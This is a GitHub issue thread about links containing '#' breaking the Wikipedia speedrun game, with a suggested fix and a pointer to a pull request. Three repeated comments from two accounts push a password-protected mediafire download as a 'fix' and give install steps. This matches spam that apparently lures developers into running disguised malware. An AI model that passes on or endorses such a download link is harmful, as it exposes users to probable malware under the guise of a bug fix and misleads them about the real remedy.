### ISSUE TITLE
Links containing '#' break the game

### ISSUE THREAD

**Issue by bricehalder** [wikispeedruns/wikipedia-speedruns#601]
At least 2 users have reported that links containing '#' break the game

> Hi! I'm playing today's prompt and there is a page that links to the target article but there is no response when I click it. It has "#" in the link. Is there any way around this?
https://discord.com/channels/936202186520678431/936212632866783333/1277838679393435753

> This is a known issue (for me). Links containing # do not work and break the app. I have learned never to click on one of those.
https://discord.com/channels/936202186520678431/936212632866783333/1277891965979070484

Potential fixes:
1) remove hyperlink if link contains '#'
2) (preferred) trim hyperlink to remove '#' and anything after - i.e. still navigate to desired page

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Resonantjacket5** [comment]
Inspected the issue briefly, while the link is redirected correctly it seems there's an issue with the client code with handling # urls

````
https://wikispeedruns.com/wiki/Kjula_Runestone#S%C3%B6_106
````
<img width="644" alt="Screenshot 2024-10-20 at 5 22 29 PM" src="https://github.com/user-attachments/assets/e895074d-35b3-45b4-9483-9ffe3f4e007a">

**Comment by Resonantjacket5** [comment]
Nvm someone is already working and proposed a fix https://github.com/wikispeedruns/wikipedia-speedruns/pull/608/files
